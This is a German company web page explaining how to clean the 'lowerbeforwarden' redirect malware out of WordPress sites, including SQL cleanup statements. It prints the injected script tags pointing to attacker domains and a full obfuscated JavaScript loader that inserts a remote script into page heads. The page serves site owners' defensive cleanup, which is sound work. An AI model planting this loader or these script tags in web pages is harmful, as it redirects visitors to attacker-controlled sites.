Kategorien
Inhalt

WordPress-Hack lowerbeforwarden entfernen

Navigation:
< zurück

Weiterleitung von lowerbeforwarden
Weiterleitung zu lowerbeforwarden

Symptom

Es handelt sich bei lowerbeforwarden um Malware.
Das bedeutet, das Ziel hinter dem Hack ist es Zugriff auf Ihr System zu erlangen und so viel Schaden wie möglich anzurichten.
Daher werden Sie beim besuchen Ihrer Webseite auf diverse Seiten umgeleitet.
Dies dient dem Zweck Kunden abzuschrecken und Ihre Besucherzahlen zu mindern.

Ursache

Durch eine Verwundbare Code-Passage in dem beliebten WordPress Plugin „WP-File-Manager“ ist es den Angreifern gelungen über die Datei „connector.minimal.php“ Zugriff auf den Webserver zu erhalten.
Dieser Fehler wurde bereits in der neusten Version des Plugins behoben.
Jedoch nützt das alleinige aktualisieren des Modules, ohne Säuberung des Systems nichts.

Lösung

Bevor Dateien entfernt oder geändert werden, muss ein Backup der gesamten Webseite sowie der Datenbank erfolgen. Am einfachsten können Sie Dateien auf einen Webhost durchsuchen, wenn Sie Zugriff per shell haben, dann sieht der Volltextsuchbefehl wie folgt aus:

grep -rli Suchbegriff ./

Da die Hacker durch den File-Manager Zugriff erhielten, sollte dieser grundsätzlich als erstes deinstalliert, beziehungsweise auf die neuste Version (6.9) aktualisiert werden.
Installieren Sie alle Plugins neu, direkt aus dem WordPress Dashboard.
Stellen Sie sicher dass das Modul „pagespeed“ (mod_pagespeed) unter cPanel sowie Plesk deaktiviert ist.
Löschen Sie alle Dateien des Moduls und die darin enthaltenen Cache-Dateien.
Als nächstes ist es nötig die versteckten Einträge des Virus in den Kerndateien zu finden und zu kontaminieren.
Dazu sollten sie sämtliche Dateien nach folgenden Codeblöcken durchsuchen.

<script src='https://scripts.lowerbeforwarden.ml/src.js?n=ns1' type='text/javascript'></script>
<script src='https://location.lowerbeforwarden.ml/src.js?n=ns1' type='text/javascript'></script>
<script src='https://temp.lowerbeforwarden.ml/src.js?n=ns1' type='text/javascript'></script>
<script src='https://scripts.lowerbeforwarden.ml/src.js?n=nb5' type='text/javascript'></script>
<script src='https://location.lowerbeforwarden.ml/src.js?n=nb5' type='text/javascript'></script>
<script src='https://temp.lowerbeforwarden.ml/src.js?n=nb5' type='text/javascript'></script>

Es sollten noch nach folgenden URLs gesucht werden:

scripts.lowerbeforwarden.ml/src.js?n=ns1
temp.lowerbeforwarden.ml/temp.js?n=nb5
location.lowerbeforwarden.ml/s.html
directednotconverted.ml/?p=
directednotconverted.ml/w_14.js
winworker.club/sw/w_11.js

Diese Zeilen lassen sich in den meisten „index.php“ Dateien finden. Man beachte, alle Plugins besitzen eine solche Datei!

Es ist möglich das sich das Script encodiert versteckt, suchen Sie auch nach dieser Zeile und entfernen Sie diese wenn nötig.

<noscript><style type="text/css"> .wpb_animate_when_almost_visible { opacity: 1; }</style></noscript> <script type=text/javascript> Element.prototype.appendAfter = function(element) {element.parentNode.insertBefore(this, element.nextSibling);}, false;(function() { var elem = document.createElement(String.fromCharCode(115,99,114,105,112,116)); elem.type = String.fromCharCode(116,101,120,116,47,106,97,118,97,115,99,114,105,112,116); elem.src = String.fromCharCode(104,116,116,112,115,58,47,47,115,99,114,105,112,116,115,46,108,111,119,101,114,98,101,102,111,114,119,97,114,100,101,110,46,109,108,47,115,114,99,46,106,115);elem.appendAfter(document.getElementsByTagName(String.fromCharCode(115,99,114,105,112,116))[0]);elem.appendAfter(document.getElementsByTagName(String.fromCharCode(104,101,97,100))[0]);document.getElementsByTagName(String.fromCharCode(104,101,97,100))[0].appendChild(elem);})();</script></head>

Der verschlüsselte Code lässt sich meist in der „header.php“ Datei nieder, diese befinden sich meist in den Themes.

Mehrere Betroffene berichteten auch von Einträgen in der Datenbank, dementsprechend gilt es auch diese zu durchsuchen.
Dies geschieht in dem Sie unter phpMyAdmin folgende Zeilen ausführen.
Beachten Sie den Prefix der Tabelle, in diesem Fall „wp“, dieser kann auf Ihrem System anders sein.

UPDATE wp_posts SET post_content = (REPLACE (post_content, “<script src='https://scripts.lowerbeforwarden.ml/src.js?n=ns1' type='text/javascript'></script>”, ""));

UPDATE wp_posts SET post_content = (REPLACE (post_content, “<script src='https://location.lowerbeforwarden.ml/src.js?n=ns1' type='text/javascript'></script>”, ""));

UPDATE wp_posts SET post_content = (REPLACE (post_content, “<script src='https://temp.lowerbeforwarden.ml/src.js?n=ns1' type='text/javascript'></script>”, ""));

UPDATE wp_posts SET post_content = (REPLACE (post_content, “<script src='https://scripts.lowerbeforwarden.ml/src.js?n=nb5' type='text/javascript'></script>”, ""));

UPDATE wp_posts SET post_content = (REPLACE (post_content, “<script src='https://location.lowerbeforwarden.ml/src.js?n=nb5' type='text/javascript'></script>”, ""));

UPDATE wp_posts SET post_content = (REPLACE (post_content, “<script src='https://temp.lowerbeforwarden.ml/src.js?n=nb5' type='text/javascript'></script>”, ""));

Wenn Sie alles entfernt haben, stellen Sie sicher das Sie den Cache Ihrer Webseite leeren.
Dies tun Sie im WordPress Backend (www.domain.de/wp-admin/).
Betätigen Sie den „Cache leeren“ Knopf unter dem Reiter „Dashboard“

Kommentar absenden

Deine E-Mail-Adresse wird nicht veröffentlicht. Erforderliche Felder sind mit * markiert.

Datenschutz
Wir, Armann Systems GmbH (Firmensitz: Deutschland), würden gerne mit externen Diensten personenbezogene Daten verarbeiten. Dies ist für die Nutzung der Website nicht notwendig, ermöglicht uns aber eine noch engere Interaktion mit Ihnen. Falls gewünscht, treffen Sie bitte eine Auswahl:
Datenschutz
Wir, Armann Systems GmbH (Firmensitz: Deutschland), würden gerne mit externen Diensten personenbezogene Daten verarbeiten. Dies ist für die Nutzung der Website nicht notwendig, ermöglicht uns aber eine noch engere Interaktion mit Ihnen. Falls gewünscht, treffen Sie bitte eine Auswahl: